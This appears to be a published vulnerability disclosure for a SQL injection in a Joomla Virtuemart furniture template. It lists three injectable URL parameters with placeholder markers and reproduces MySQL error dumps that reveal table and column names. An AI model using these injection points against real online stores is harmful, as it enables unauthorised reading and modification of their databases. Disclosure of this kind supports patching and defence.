############################################################################################### # Exploit Title : Joomla Furniture Virtuemart Templates 1.5 SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 25/02/2019 # Vendor Homepage : ordasoft.com # Software Download Link : ordasoft.com/download-furniture-joomla-virtuemart-template # Software Information Link : ordasoft.com/furniture-joomla-virtuemart-template # Software Affected Versions : Joomla 1.5 ~ 2.5.x - 3.x - 3.6.x and all previous versions # Software Price : Paid Download - 69$ - 90$ - 259$ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ############################################################################################### # Description about Software : *************************** OS Furniture is a Joomla Virtuemart template with a clean and neat design, also built with the modern e-commerce tendencies. Furniture Joomla template is powered with OS Joomla Blank Template, one of the best Joomla framework. It is fully responsive and supports both CSS3 and HTML5 that help to create refined web pages with semantic accuracy. OS Furniture includes lots of useful built-in features to help you build an awesome on-line store. ############################################################################################### # Impact : *********** Joomla Furniture Virtuemart Template 1.5 [ and other versions ] component for Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit l atent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request t o the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. ############################################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_furniture&view=furniture&cat_id=[SQL Injection] /index.php?option=com_furniture&view=furniture&cat_id=[ID-NUMBER]&f_id=[SQL Injection] /index.php?option=com_furniture&view=furniture&cat_id=[ID-NUMBER]&f_id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=fr ############################################################################################### # Example SQL Database Error : ****************************** No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND f.id > AND f.published=1 ORDER BY f.id asc' at line 1 SQL=SELECT f.id,f.published FROM jadis_furnitures AS f WHERE f.cat_id = AND f.id > AND f.published=1 ORDER BY f.id asc No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND f.id < AND f.published=1 ORDER BY f.id desc' at line 1 SQL=SELECT f.id,f.published FROM jadis_furnitures AS f WHERE f.cat_id = AND f.id < AND f.published=1 ORDER BY f.id desc No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 SQL=SELECT id,name,name_en FROM jadis_furnitures_cat WHERE id = ############################################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ###############################################################################################